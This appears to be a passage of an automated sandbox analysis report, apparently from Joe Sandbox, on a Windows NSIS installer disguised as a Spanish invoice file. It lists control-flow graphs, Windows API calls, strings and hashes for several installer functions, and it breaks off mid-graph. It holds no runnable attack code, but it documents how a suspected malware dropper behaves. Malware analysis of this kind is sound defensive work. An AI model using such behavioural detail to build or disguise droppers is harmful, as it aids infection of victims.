lstrcmpiW 93->110 111 403aae-403ab8 lstrcatW 93->111 96->97 108 403c58-403c63 ExitWindowsEx 97->108 109 403c4c-403c56 97->109 98->86 99->88 99->98 106->67 107->69 108->91 112 403c65-403c67 call 401533 108->112 109->108 109->112 110->107 113 403ae4-403aeb 110->113 111->110 112->91 116 403af4 call 405df9 113->116 117 403aed-403af2 call 405e19 113->117 124 403af9-403b0b SetCurrentDirectoryW 116->124 117->124 126 403b1c-403b36 call 406af5 124->126 127 403b0d-403b17 call 406af5 124->127 131 403b37-403b55 call 405e95 DeleteFileW 126->131 127->126 134 403ba4-403bae 131->134 135 403b57-403b6b CopyFileW 131->135 134->131 137 403bb0-403bb6 call 406218 134->137 135->134 136 403b6d-403b99 call 406218 call 405e95 call 4066b1 135->136 136->134 145 403b9b-403ba2 CloseHandle 136->145 137->107 145->134
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008001), ref: 004036F3
                                  • GetVersionExW.KERNEL32 ref: 0040371C
                                  • GetVersionExW.KERNEL32(?), ref: 0040372F
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037D7
                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403811
                                  • OleInitialize.OLE32(00000000), ref: 00403818
                                  • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 00403837
                                  • GetCommandLineW.KERNEL32(Tolkningen Setup,NSIS Error), ref: 0040384C
                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",?,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000), ref: 00403898
                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403996
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039A7
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B3
                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039C7
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039CF
                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E0
                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039E8
                                  • DeleteFileW.KERNELBASE(1033), ref: 00403A02
                                    • Part of subcall function 004033C8: GetTickCount.KERNEL32 ref: 004033DB
                                    • Part of subcall function 004033C8: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,00000400,?,?,?,?,?), ref: 004033F7
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AA5
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AB8
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AC7
                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000,00000000), ref: 00403AD6
                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AFE
                                  • DeleteFileW.KERNEL32(004209C0,004209C0,?,0042A000,?), ref: 00403B51
                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,004209C0,?), ref: 00403B63
                                  • CloseHandle.KERNEL32(00000000,004209C0,004209C0,?,004209C0,00000000), ref: 00403B9C
                                    • Part of subcall function 00405DF9: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00405E01
                                    • Part of subcall function 00405DF9: GetLastError.KERNEL32 ref: 00405E0B
                                  • OleUninitialize.OLE32(00000000), ref: 00403BCA
                                  • ExitProcess.KERNEL32 ref: 00403BE1
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BF7
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403BFE
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C13
                                  • AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00403C36
                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5B
                                    • Part of subcall function 004065D1: CharNextW.USER32(?,00403897,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",?,"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe",00000000), ref: 004065E7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                  • String ID: "C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\fanin$C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Tolkningen Setup$UXTHEME$\Temp$~nsu
                                  • API String ID: 1152188737-768733493
                                  • Opcode ID: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                  • Instruction ID: 07a9971b8f29bbd68b878d9119023e68a6b74827d1d77f0d98df9434206269f1
                                  • Opcode Fuzzy Hash: 8cd5672f1bbfe50c95fd09064464ed4eca0056383847438df08223233b51ff5d
                                  • Instruction Fuzzy Hash: 4FD137712043116AD7207F619D46B6B3AACAB4574AF51443FF582B62D2DBBC8E408B2E
                                  Function 00404B0B Relevance: 54.3, APIs: 36, Instructions: 295windowclipboardmemoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 146 404b0b-404b22 147 404cb4-404cba 146->147 148 404b28-404bf6 GetDlgItem * 3 call 4054de call 405810 GetClientRect GetSystemMetrics SendMessageW * 2 146->148 150 404d00-404d06 147->150 151 404cbc-404ce2 GetDlgItem CreateThread CloseHandle 147->151 171 404bf8-404c0a SendMessageW * 2 148->171 172 404c0c-404c12 148->172 154 404d31-404d37 150->154 155 404d08-404d12 150->155 153 404ce8-404cf1 call 405736 151->153 164 404cf6-404cfd 153->164 156 404d39-404d40 154->156 157 404d7f-404d82 154->157 155->153 160 404d14-404d2f ShowWindow * 2 call 4054de 155->160 161 404d42-404d4c 156->161 162 404d55-404d6a ShowWindow 156->162 157->153 165 404d88-404d8c 157->165 160->153 168 404d4e-404d53 call 405933 161->168 169 404d7b-404d7d 162->169 170 404d6c-404d76 call 405d15 162->170 165->153 173 404d92-404daa SendMessageW 165->173 168->153 169->168 170->169 171->172 176 404c14-404c1c SendMessageW 172->176 177 404c1e-404c37 call 4054f5 172->177 178 404ec0-404ec2 173->178 179 404db0-404de2 CreatePopupMenu call 405e95 AppendMenuW 173->179 176->177 185 404c39-404c4d ShowWindow 177->185 186 404c6b-404c91 GetDlgItem SendMessageW 177->186 178->164 187 404de4-404df4 GetWindowRect 179->187 188 404df8-404e14 TrackPopupMenu 179->188 189 404c5a 185->189 190 404c4f-404c58 ShowWindow 185->190 186->178 192 404c97-404caf SendMessageW * 2 186->192 187->188 188->178 191 404e1a-404e26 188->191 193 404c60-404c66 call 4054de 189->193 190->193 194 404e2e-404e48 SendMessageW 191->194 192->178 193->186 194->194 196 404e4a-404e74 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 194->196 197 404e76-404ea2 SendMessageW 196->197 197->197 198 404ea4-404eba GlobalUnlock SetClipboardData CloseClipboard 197->198 198->178
                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 00404B6C
                                  • GetDlgItem.USER32(?,000003EE), ref: 00404B7C
                                  • GetClientRect.USER32(00000000,?), ref: 00404BB9
                                  • GetSystemMetrics.USER32(00000002), ref: 00404BC1
                                  • SendMessageW.USER32(00000000,00001061,00000000,00000002), ref: 00404BE3
                                  • SendMessageW.USER32(00000000,00001036,00004000,00004000), ref: 00404BF2
                                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00404C00
                                  • SendMessageW.USER32(00000000,00001026,00000000,?), ref: 00404C0A
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  • SendMessageW.USER32(00000000,00001024,00000000,?), ref: 00404C1C
                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404C40
                                  • ShowWindow.USER32(00000000,00000008), ref: 00404C52
                                  • GetDlgItem.USER32(?,000003EC), ref: 00404C74
                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00404C88
                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00404CA3
                                  • SendMessageW.USER32(00000000,00002001,00000000,?), ref: 00404CAD
                                  • ShowWindow.USER32(00000000), ref: 00404D22
                                  • ShowWindow.USER32(00010480,00000008), ref: 00404D27
                                  • GetDlgItem.USER32(?,000003F8), ref: 00404B8C
                                    • Part of subcall function 004054DE: SendMessageW.USER32(00000028,?,?,00405313), ref: 004054EC
                                  • GetDlgItem.USER32(?,000003EC), ref: 00404CCD
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000583F,00000000), ref: 00404CDB
                                  • CloseHandle.KERNELBASE(00000000), ref: 00404CE2
                                  • ShowWindow.USER32(00000008), ref: 00404D5D
                                  • SendMessageW.USER32(00010480,00001004,00000000,00000000), ref: 00404D9C
                                  • CreatePopupMenu.USER32 ref: 00404DB0
                                  • AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00404DCC
                                  • GetWindowRect.USER32(00010480,?), ref: 00404DEA
                                  • TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 00404E0C
                                  • SendMessageW.USER32(00010480,00001073,00000000,?), ref: 00404E3B
                                  • OpenClipboard.USER32(00000000), ref: 00404E4B
                                  • EmptyClipboard.USER32 ref: 00404E51
                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00404E5D
                                  • GlobalLock.KERNEL32(00000000), ref: 00404E6A
                                  • SendMessageW.USER32(00010480,00001073,00000000,?), ref: 00404E86
                                  • GlobalUnlock.KERNEL32(?), ref: 00404EA9
                                  • SetClipboardData.USER32(0000000D,?), ref: 00404EB4
                                  • CloseClipboard.USER32 ref: 00404EBA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrcat
                                  • String ID:
                                  • API String ID: 2901622961-0
                                  • Opcode ID: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                  • Instruction ID: 6359324f75213449b6abc0588f6453f91f7fc730003d35bba9c6bb800d03804c
                                  • Opcode Fuzzy Hash: e3a3b5db6e8f7872d6748160a89fdbae3d99834f52d0e9e06fc12283005a9987
                                  • Instruction Fuzzy Hash: BEA1C5B1205704BBD320AB25DD49F5B7FADFF88750F01493EF681A62A1CB788841CB69
                                  Function 004066F4 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155filestringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 693 4066f4-40671d call 406613 696 406736-406740 693->696 697 40671f-406731 DeleteFileW 693->697 699 406742-406744 696->699 700 406753-406766 call 406af5 696->700 698 4068b5-4068be 697->698 701 4068a4-4068aa 699->701 702 40674a-40674d 699->702 707 406776-406777 call 406ceb 700->707 708 406768-406774 lstrcatW 700->708 706 4068b4 701->706 702->700 704 40686d-406875 call 4065aa 702->704 704->706 715 406877-40688b call 406531 call 406560 704->715 706->698 710 40677c-406781 707->710 708->710 713 406783-40678b 710->713 714 40678d-406793 lstrcatW 710->714 713->714 716 406795-4067b8 lstrlenW FindFirstFileW 713->716 714->716 730 4068ac-4068af call 405d15 715->730 731 40688d-40688f 715->731 718 406856-40685b 716->718 719 4067be-4067c0 716->719 718->706 721 40685d-40686b 718->721 722 4067c1-4067c6 719->722 721->701 721->704 724 4067c8-4067ce 722->724 725 4067df-4067f2 call 406af5 722->725 728 4067d0-4067d5 724->728 729 406838-406849 FindNextFileW 724->729 738 4067f4-4067fb 725->738 739 406806-40680f call 406560 725->739 728->725 736 4067d7-4067dd 728->736 729->722 734 40684f-406850 FindClose 729->734 730->706 731->701 732 406891-4068a2 call 405d15 call 406218 731->732 732->706 734->718 736->725 736->729 738->729 741 4067fd-4067ff call 4066f4 738->741 748 406830-406833 call 405d15 739->748 749 406811-406813 739->749 747 406804 741->747 747->729 748->729 751 406815-406826 call 405d15 call 406218 749->751 752 406828-40682e 749->752 751->729 752->729
                                  APIs
                                    • Part of subcall function 00406613: lstrlenW.KERNEL32(00425A48,00000000,00425A48,00425A48,00000000,?,?,00406716,?,00000000,75923420,?), ref: 00406667
                                    • Part of subcall function 00406613: GetFileAttributesW.KERNELBASE(00425A48,00425A48), ref: 00406678
                                  • DeleteFileW.KERNELBASE(?,?,00000000,75923420,?), ref: 00406720
                                  • lstrcatW.KERNEL32(00425248,\*.*,00425248,?,00000000,?,00000000,75923420,?), ref: 00406772
                                  • lstrcatW.KERNEL32(?,004082B0,?,00425248,?,00000000,?,00000000,75923420,?), ref: 00406793
                                  • lstrlenW.KERNEL32(?), ref: 00406796
                                  • FindFirstFileW.KERNEL32(00425248,?), ref: 004067AD
                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?), ref: 0040683E
                                  • FindClose.KERNEL32(00000000), ref: 00406850
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                  • String ID: \*.*
                                  • API String ID: 2636146433-1173974218
                                  • Opcode ID: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                  • Instruction ID: ed3bb2814488eceec14de134e67e78f5f853c3bf88eed2e9a0dc8686b927a400
                                  • Opcode Fuzzy Hash: 0962212a27e10f8c29849c35d287c52ef14dcf59cdd65fcf28beb03e610e8e2c
                                  • Instruction Fuzzy Hash: E841193210671069D7207B399D45A6B76E8DF81318F12453FF883B21D1EB7C8C6686AF
                                  Function 0040234F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.OLE32(004089D0,?,00000001,004089B0,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004023D8
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll, xrefs: 004024AC
                                  • C:\Users\user\AppData\Local\Temp\fanin\Leflet, xrefs: 0040241F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: CreateInstance
                                  • String ID: C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll
                                  • API String ID: 542301482-2943796473
                                  • Opcode ID: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                  • Instruction ID: d428ad0e776067b9467a460b3bd0699ffb91532d5b811a166a6037c041011ccd
                                  • Opcode Fuzzy Hash: 792a9dd0bafcf7b136060fe4d29ddbdc1cf7de8d0bbc27437ca0ffbf2965f736
                                  • Instruction Fuzzy Hash: CA414A72604341AFC300EFA5C948A2BBBE9FF89314F10092EF695DB291DB79D805CB16
                                  Function 004065AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNELBASE(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                  • FindClose.KERNEL32(00000000), ref: 004065C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Find$CloseFileFirst
                                  • String ID: HvB
                                  • API String ID: 2295610775-1619000230
                                  • Opcode ID: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                  • Instruction ID: d1368554cb410e246732b21b307163ecdbcfd804cd616700c419d461b784c5b9
                                  • Opcode Fuzzy Hash: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                  • Instruction Fuzzy Hash: 72D0123155A1206FC25057387E0C84B7A999F153717518B36B0A6F11E4C7348C6686AD
                                  Function 00402048 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • ShowWindow.USER32(00000000,00000000), ref: 00402061
                                  • EnableWindow.USER32(00000000,00000000), ref: 0040206C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Window$EnableShow
                                  • String ID:
                                  • API String ID: 1136574915-0
                                  • Opcode ID: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                  • Instruction ID: 5e1a6dc9ac369cb9fdd6eee03f9e71544f162ca31fdf6318b4aac8087fee14a7
                                  • Opcode Fuzzy Hash: 52fef71910991febb17206dff6bdae22265bb691ab5af8558c030a970d53b9a7
                                  • Instruction Fuzzy Hash: 30E026726483009FE354AF20E94E96AB768EB40326F20043FF940A40C1CB7D2C41867E
                                  Function 00404F6D Relevance: 52.9, APIs: 35, Instructions: 374windowstringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 199 404f6d-404f86 200 404f8c-404f92 199->200 201 40510e-405120 199->201 200->201 202 404f98-404f9b 200->202 203 405122-405162 GetDlgItem * 2 call 4054f5 SetClassLongW call 401533 201->203 204 405168-40517c 201->204 205 404fb7-404fba 202->205 206 404f9d-404fb2 SetWindowPos 202->206 203->204 208 4051ba-4051bf call 4054c3 204->208 209 40517e-405180 204->209 211 40500a-405010 205->211 212 404fbc-404fdb ShowWindow 205->212 210 4050fa 206->210 220 4051c4-4051e3 208->220 215 4051b2-4051b4 209->215 216 405182-40518d call 401399 209->216 217 4050fe-405109 call 405736 210->217 221 405012-405027 DestroyWindow 211->221 222 40502c-40502f 211->222 212->217 219 404fe1-404ff7 GetWindowLongW 212->219 215->208 218 405485 215->218 216->215 235 40518f-4051ad SendMessageW 216->235 233 405487-40548e 217->233 218->233 219->217 227 404ffd-405005 ShowWindow 219->227 228 4051e5-4051f0 call 401533 220->228 229 4051f6-4051fc 220->229 230 405469-405470 221->230 231 405031-40503f SetWindowLongW 222->231 232 405044-40504a 222->232 227->217 228->229 239 405202-405204 229->239 240 405445-40545e DestroyWindow EndDialog 229->240 230->218 238 405472-405474 230->238 231->233 232->210 241 405050-40506a GetDlgItem 232->241 235->233 238->218 244 405476-40547f ShowWindow 238->244 239->240 245 40520a-405261 call 405e95 call 4054f5 * 3 GetDlgItem 239->245 242 405464 240->242 246 40506c-405085 SendMessageW IsWindowEnabled 241->246 247 40508f-405094 241->247 242->230 244->218 275 405263-40526b 245->275 276 40526f-4052be ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 245->276 246->218 251 40508b 246->251 248 405096-405097 247->248 249 405099-40509c 247->249 252 4050da-4050df call 405933 248->252 253 4050ab-4050ae 249->253 254 40509e-4050a5 249->254 251->247 252->217 256 4050e1-4050f4 SendMessageW 253->256 258 4050b0-4050b7 253->258 254->256 257 4050a7-4050a9 254->257 256->210 257->252 262 4050c7-4050d0 call 401533 258->262 263 4050b9-4050c5 call 401533 258->263 262->217 273 4050d2 262->273 272 4050d8 263->272 272->252 273->272 275->276 277 4052c0-4052c1 276->277 278 4052c3 276->278 279 4052c4-4052ef GetSystemMenu EnableMenuItem SendMessageW 277->279 278->279 280 4052f1-405306 SendMessageW 279->280 281 405308 279->281 282 40530e-405354 call 4054de call 405cf6 call 406af5 lstrlenW call 405e95 SetWindowTextW call 401399 280->282 281->282 282->220 293 40535a-40535c 282->293 293->220 294 405362-405366 293->294 295 405385-405399 DestroyWindow 294->295 296 405368-40536e 294->296 295->242 298 40539f-4053cc CreateDialogParamW 295->298 296->218 297 405374-40537a 